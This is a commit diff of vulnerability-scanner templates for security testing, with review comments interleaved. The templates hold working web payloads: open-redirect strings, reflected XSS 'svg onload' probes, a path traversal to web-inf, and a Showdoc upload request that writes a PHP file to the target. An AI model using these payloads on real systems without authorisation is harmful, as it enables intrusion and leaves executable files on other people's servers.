@ -5,6 +5,7 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: low severity: low
description: Additional routes may be displayed description: Additional routes may be displayed
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET

View File

@ -5,11 +5,13 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb author: that_juan_ & dwisiswant0 & wdahlenb
severity: low severity: low
description: View recent HTTP requests and responses description: View recent HTTP requests and responses
tags: springboot,disclosure
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/trace" - "{{BaseURL}}/trace"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word

59
network/rdp-detect.yaml Normal file
View File

@ -0,0 +1,59 @@
id: rdp-detect
info:
name: Windows RDP Detection
author: princechaddha
severity: info
tags: windows,rdp,network
network:
- inputs:
- data: "0300002a25e00000000000436f6f6b69653a206d737473686173683d746573740d0a010008000b000000"
type: hex
read-size: 2048
host:
- "{{Hostname}}"
- "{{Hostname}}:3389"
matchers:
- type: word
encoding: hex
name: win2000
words:
- "0300000b06d00000123400"
- type: word
encoding: hex
name: win2003
words:
- "030000130ed000001234000300080002000000"
- type: word
encoding: hex
name: win2008
words:
- "030000130ed000001234000200080002000000"
- type: word
encoding: hex
name: win7or2008R2
words:
- "030000130ed000001234000209080002000000"
- type: word
encoding: hex
name: win2008R2DC
words:
- "030000130ed000001234000201080002000000"
- type: word
encoding: hex
name: win10
words:
- "030000130ed00000123400021f080002000000"
- type: word
encoding: hex
name: win2012R2OR8
words:
- "030000130ed00000123400020f080002000000"
- type: word
encoding: hex
name: win2016
words:
- "030000130ed00000123400021f080008000000"
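
Review bot: Every matcher is a complete, OS-specific response in hex, so an RDP service whose reply differs in any byte from these eight strings produces no result even though the template is named "Windows RDP Detection". Seven of the eight share the prefix `030000130ed00000123400`; add a generic matcher on that prefix for detection and keep the named ones for the version guess. Listing both `{{Hostname}}` and `{{Hostname}}:3389` under `host` also means the probe goes to whatever port the input carried, which deserves a comment in the template.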

View File

@ -1,20 +0,0 @@
id: detect-springboot-actuator
info:
name: Detect Springboot Actuators
author: that_juan_ & dwisiswant0 & wdahlenb
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/actuator"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"_links":{"self"'
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: springboot-actuator
info:
name: Detect Springboot Actuators
author: that_juan_ & dwisiswant0 & wdahlenb
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/actuator"
- "{{BaseURL}}/favicon.ico"
matchers-condition: or
matchers:
- type: word
part: body
words:
- '"_links":'
- '"self":'
- '"health"'
condition: and
- type: dsl
name: "favicon"
dsl:
- "status_code==200 && (\"116323821\" == mmh3(base64_py(body)))"
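
Review bot: The new `info` block has no `tags` line, although this commit adds `tags: springboot,disclosure` to the other Spring Boot templates, so a run filtered on `springboot` skips the one template that detects the actuator root. With `matchers-condition: or` and two paths, the word matcher is also evaluated against the `/favicon.ico` response and the favicon hash against the `/actuator` response; give the word matcher a `name`, as the favicon matcher has, so the output shows which of the two fired.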

View File

@ -0,0 +1,25 @@
id: wazuh-detect
info:
name: wazuh detect
author: cyllective
severity: info
description: Detects wazuh
tags: tech,wazuh
references:
- https://github.com/wazuh/wazuh
requests:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: word
part: body
condition: or
words:
- '&quot;id&quot;:&quot;wazuh&quot;'
- '&quot;title&quot;:&quot;Wazuh&quot;'
- '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
- '&quot;url&quot;:&quot;/app/wazuh&quot;'
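
Review bot: The key is written `references:` here, while every other template in this commit uses `reference`, so the link is likely ignored by anything that reads the `reference` field. Rename the key; the list form underneath can stay.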

View File

@ -21,10 +21,7 @@ requests:
- '{{BaseURL}}/example%E3%80%82com' - '{{BaseURL}}/example%E3%80%82com'
- '{{BaseURL}}/%5Cexample.com' - '{{BaseURL}}/%5Cexample.com'
- '{{BaseURL}}/example.com' - '{{BaseURL}}/example.com'
- '{{BaseURL}}\example.com'
- '{{BaseURL}}//example.com/' - '{{BaseURL}}//example.com/'
- '{{BaseURL}}\/\/example.com/'
- '{{BaseURL}}%00\/\/example.com/'
- '{{BaseURL}}/%00/example.com/' - '{{BaseURL}}/%00/example.com/'
- '{{BaseURL}}/%09/example.com/' - '{{BaseURL}}/%09/example.com/'
- '{{BaseURL}}/%0a/example.com/' - '{{BaseURL}}/%0a/example.com/'
@ -33,14 +30,9 @@ requests:
- '{{BaseURL}}/%5cexample.com/%2f%2e%2e' - '{{BaseURL}}/%5cexample.com/%2f%2e%2e'
- '{{BaseURL}}@example.com' - '{{BaseURL}}@example.com'
- '{{BaseURL}}/{{BaseURL}}example.com' - '{{BaseURL}}/{{BaseURL}}example.com'
- '{{BaseURL}}\{{BaseURL}}example.com'
- '{{BaseURL}}//{{BaseURL}}example.com/' - '{{BaseURL}}//{{BaseURL}}example.com/'
- '{{BaseURL}}\/\/{{BaseURL}}example.com/'
- '{{BaseURL}}%00\/\/{{BaseURL}}example.com/'
- '{{BaseURL}}////{{BaseURL}}example.com/%2f%2e%2e' - '{{BaseURL}}////{{BaseURL}}example.com/%2f%2e%2e'
- '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e' - '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e'
- '{{BaseURL}}/〱{{BaseURL}}example.com/%2f%2e%2e'
- '{{BaseURL}}@{{BaseURL}}example.com'
- '{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' - 
'{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com'
matchers: matchers:
- type: regex - type: regex
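Review bot: In the path string, the token `diexample.com` between `dest_url=example.com` and `document=example.com` has no `=`, so it is sent as a bare parameter name instead of a name/value pair, and `page=example.com` appears twice (at the start and again after `out=example.com`). Restore the intended parameter name for the first and drop the duplicate `page`, so the list tests each parameter exactly once.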

View File

@ -19,21 +19,21 @@ requests:
matchers: matchers:
- type: word - type: word
words: words:
- "\"<svg/onload=confirm('q')>" - "'>\"<svg/onload=confirm('q')>"
- "\"<svg/onload=confirm('s')>" - "'>\"<svg/onload=confirm('s')>"
- "\"<svg/onload=confirm('search')>" - "'>\"<svg/onload=confirm('search')>"
- "\"<svg/onload=confirm('id')>" - "'>\"<svg/onload=confirm('id')>"
- "\"<svg/onload=confirm('action')>" - "'>\"<svg/onload=confirm('action')>"
- "\"<svg/onload=confirm('keyword')>" - "'>\"<svg/onload=confirm('keyword')>"
- "\"<svg/onload=confirm('query')>" - "'>\"<svg/onload=confirm('query')>"
- "\"<svg/onload=confirm('page')>" - "'>\"<svg/onload=confirm('page')>"
- "\"<svg/onload=confirm('keywords')>" - "'>\"<svg/onload=confirm('keywords')>"
- "\"<svg/onload=confirm('url')>" - "'>\"<svg/onload=confirm('url')>"
- "\"<svg/onload=confirm('view')>" - "'>\"<svg/onload=confirm('view')>"
- "\"<svg/onload=confirm('cat')>" - "'>\"<svg/onload=confirm('cat')>"
- "\"<svg/onload=confirm('name')>" - "'>\"<svg/onload=confirm('name')>"
- "\"<svg/onload=confirm('key')>" - "'>\"<svg/onload=confirm('key')>"
- "\"<svg/onload=confirm('p')>" - "'>\"<svg/onload=confirm('p')>"
part: body part: body
condition: or condition: or
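Review bot: All 15 entries under `words:` now require the `'>"` prefix to come back unencoded in the body, but the request `path` lines that send the payload are outside this hunk. Confirm they were updated to send the same `'>"<svg/onload=confirm('q')>` style string for each parameter; if the paths still send the old payload without `'>`, none of these words can match and the template stops reporting without any error.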
@ -42,6 +42,14 @@ requests:
- "text/html" - "text/html"
part: header part: header
- type: word
words:
- "<title>Access Denied</title>"
- "You don't have permission to access"
part: body
condition: and
negative: true
- type: status - type: status
status: status:
- 200 - 200
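Review bot: The added negative matcher uses `condition: and`, so it only suppresses a result when both `<title>Access Denied</title>` and `You don't have permission to access` are present; a block page carrying just one of the two strings still passes and can be reported as a finding. If either string alone should exclude the response, use `condition: or` on this matcher.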

View File

@ -5,6 +5,10 @@ info:
author: emenalf & tirtha_mandal author: emenalf & tirtha_mandal
severity: critical severity: critical
tags: moodle,lfi tags: moodle,lfi
reference: |
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
- http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
requests: requests:
- method: GET - method: GET
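Review bot: The three URLs added under `reference:` are Oracle E-Business Suite papers, while the `tags:` line directly above reads `moodle,lfi`. One of the two is wrong for this template: align the tags (and the id and name outside this hunk, if needed) with the product the references cover, or replace the references with ones for the product the template targets.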

View File

@ -4,6 +4,7 @@ info:
author: princechaddha author: princechaddha
severity: high severity: high
tags: myucms,lfi tags: myucms,lfi
reference: https://blog.csdn.net/yalecaltech/article/details/104908257
requests: requests:
- method: GET - method: GET

View File

@ -1,15 +1,14 @@
id: nuuo-nvrmini2-upgradehandlephp-rce id: nuuo-nvrmini2-upgradehandlephp-rce
info: info:
name: NUUO NVRmini2 3.0.8 - Remote Code Execution name: NUUO NVRmini 2 3.0.8 - Remote Code Execution
author: berkdusunur author: berkdusunur
severity: critical severity: critical
tags: rce tags: rce
reference: |
# Reference:- - https://www.exploit-db.com/exploits/45070
# https://www.exploit-db.com/exploits/45070 - https://github.com/berkdsnr/NUUO-NVRMINI-RCE
# https://github.com/berkdsnr/NUUO-NVRMINI-RCE - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
# https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
requests: requests:
- method: GET - method: GET
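Review bot: `reference: |` is a literal block scalar, so the three `- https://...` lines are stored as one multi-line string with the dashes included, not as a YAML list. If consumers of the template are meant to iterate over the references, drop the `|` and keep the `- ` items as a plain sequence; if a string is intended, say so in the template guide, because the same pattern is used in several other files in this commit. The `id` also still reads `nvrmini2` while the name is now `NVRmini 2`.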
@ -18,8 +17,8 @@ requests:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: word
regex: words:
- "/upload_tmp_dir/" - "/upload_tmp_dir/"
part: body part: body

View File

@ -1,9 +1,10 @@
id: oa-v9-uploads-file id: oa-v9-uploads-file
info: info:
name: OA V9 Uploads File name: OA V9 RCE via File Upload
author: pikpikcu author: pikpikcu
severity: high severity: high
description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software.
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
tags: rce,jsp tags: rce,jsp
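Review bot: `severity: high` is left unchanged although the new name and description state that uploaded files are executed by the server, which is remote code execution; the other RCE templates in this commit (NUUO NVRmini 2, PowerCreator CMS RCE, Showdoc File Upload RCE) are rated `critical`. Raise the severity or explain the lower rating in the description. The `id` still reads `oa-v9-uploads-file`, which no longer matches the new name.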

View File

@ -4,7 +4,7 @@ info:
name: PowerCreator CMS RCE name: PowerCreator CMS RCE
author: pikpikcu author: pikpikcu
severity: critical severity: critical
reference: http://www.mstir.cn/index.php/2020/11/18/powercreatorcms-rce/ reference: https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/
tags: rce,powercreator tags: rce,powercreator
requests: requests:

View File

@ -1,23 +0,0 @@
id: rce-via-java-deserialization
info:
name: Java Deserialization [RCE]
author: uhnysh
severity: critical
tags: java,rce
reference: https://www.synopsys.com/blogs/software-security/mitigate-java-deserialization-vulnerability-jboss/
# This can only be used to detect the vuln, please make sure to run ysoserial over the URLs to verify.
requests:
- method: GET
path:
- "{{BaseURL}}/josso/%5C../invoker/EJBInvokerServlet/"
- "{{BaseURL}}/josso/%5C../invoker/JMXInvokerServlet/"
- "{{BaseURL}}/invoker/JMXInvokerServlet/"
- "{{BaseURL}}/invoker/EJBInvokerServlet/"
matchers:
- type: word
words:
- "org.jboss.invocation.MarshalledValue"
- "java.lang"
condition: and
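Review bot: The template is deleted outright and no replacement covering the four `invoker/EJBInvokerServlet` and `invoker/JMXInvokerServlet` paths is visible in this part of the diff, and the commit message ("Updation") gives no reason. If the check was moved or superseded, name the new template in the commit message; otherwise detection coverage for these endpoints is lost.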

View File

@ -0,0 +1,25 @@
id: resin-cnnvd-200705-315
info:
name: Caucho Resin Information Disclosure
author: princechaddha
severity: high
reference: |
- http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315
tags: resin,caucho,lfr
requests:
- method: GET
path:
- "{{BaseURL}}/%20../web-inf/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "/ ../web-inf/"
- "Directory of /"
condition: and
part: body
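Review bot: The `tags:` line uses `lfr`, while the other file-read templates touched in this commit are tagged `lfi` (`moodle,lfi`, `myucms,lfi`), so a tag-based run on `lfi` will skip this template. Use `lfi`, or list it alongside `lfr`. The template also has no `description:` explaining what a directory listing of `web-inf` exposes, which the `high` severity should be justified by.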

View File

@ -0,0 +1,47 @@
id: showdoc-file-upload-rce
info:
name: Showdoc < 2.8.6 File Upload RCE
author: pikpikcu
severity: critical
reference: https://github.com/star7th/showdoc/pull/1059
tags: rce,fileupload,showdoc
requests:
- raw:
- |
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip
----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain
<?php phpinfo();?>
----------------------------835846770881083140190633--
- |
GET /Public/Uploads{{url_decode("§path§")}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
extractors:
- type: regex
name: path
group: 1
internal: true
part: body
regex:
- '/Uploads\\(.*?)"\,"success"'
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "PHP Extension")'
- 'contains(body_2, "PHP Version")'
- 'status_code_2 == 200'
condition: and
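Review bot: The first raw request writes a PHP file to the target and nothing in the template removes it or tells the operator, so every positive result leaves an executable file behind under `/Public/Uploads`. Add a `description:` that states this and a tag such as `intrusive` so the template can be excluded from routine scans of production hosts. Separately, `Content-Length: 239` is hardcoded in the raw request and will be wrong as soon as the body is edited.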

View File

@ -4,7 +4,10 @@ info:
name: Spring Boot Actuators (Jolokia) XXE name: Spring Boot Actuators (Jolokia) XXE
author: dwisiswant0 author: dwisiswant0
severity: high severity: high
description: todo description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine.
reference: |
- https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
- https://github.com/mpgn/Spring-Boot-Actuator-Exploit
tags: springboot,jolokia,xxe tags: springboot,jolokia,xxe
requests: requests:
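Review bot: The new `description:` has two typos, `Actuators's` and `preform` (should be `Actuator's` and `perform`), and the clause after `attack,` runs on without a conjunction. Suggested wording for the middle of the sentence: "allows remote attackers to perform an XML External Entity attack and include content stored on a remote server as if it were local, which can lead to code execution or disclosure of sensitive information".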

View File

@ -9,14 +9,19 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E" - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "<svg/onload=alert(1337)>" - "'>\"<svg/onload=confirm('test')>"
part: body part: body
- type: word - type: word
words: words:
- "text/html" - "text/html"
part: header part: header
- type: status
status:
- 200

View File

@ -17,4 +17,3 @@ workflows:
- template: cves/2020/CVE-2020-3187.yaml - template: cves/2020/CVE-2020-3187.yaml
- template: cves/2020/CVE-2020-3452.yaml - template: cves/2020/CVE-2020-3452.yaml
- template: cves/2018/CVE-2018-0296.yaml - template: cves/2018/CVE-2018-0296.yaml
- template: cves/2018/CVE-2018-0101.yaml

View File

@ -11,3 +11,4 @@ workflows:
- template: vulnerabilities/other/ruijie-networks-rce.yaml - template: vulnerabilities/other/ruijie-networks-rce.yaml
- template: exposures/configs/ruijie-information-disclosure.yaml - template: exposures/configs/ruijie-information-disclosure.yaml
- template: exposures/configs/ruijie-smartweb-disclosure.yaml - template: exposures/configs/ruijie-smartweb-disclosure.yaml
- template: exposures/configs/ruijie-phpinfo.yaml

View File

@ -11,11 +11,12 @@ info:
workflows: workflows:
- template: technologies/detect-springboot-actuator.yaml - template: technologies/springboot-actuator.yaml
subtemplates: subtemplates:
- template: misconfiguration/springboot/springboot-configprops.yaml - template: misconfiguration/springboot/springboot-configprops.yaml
- template: misconfiguration/springboot/springboot-env.yaml - template: misconfiguration/springboot/springboot-env.yaml
- template: misconfiguration/springboot/springboot-heapdump.yaml - template: misconfiguration/springboot/springboot-heapdump.yaml
- template: misconfiguration/springboot/springboot-httptrace.yaml
- template: misconfiguration/springboot/springboot-loggers.yaml - template: misconfiguration/springboot/springboot-loggers.yaml
- template: misconfiguration/springboot/springboot-mappings.yaml - template: misconfiguration/springboot/springboot-mappings.yaml
- template: misconfiguration/springboot/springboot-trace.yaml - template: misconfiguration/springboot/springboot-trace.yaml
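Review bot: The trigger template path changes from `technologies/detect-springboot-actuator.yaml` to `technologies/springboot-actuator.yaml`, but the rename of that file is not visible in this part of the diff. If the file was not renamed in the same commit, the workflow's trigger never matches and none of the subtemplates run. The same existence check applies to the added `misconfiguration/springboot/springboot-httptrace.yaml`.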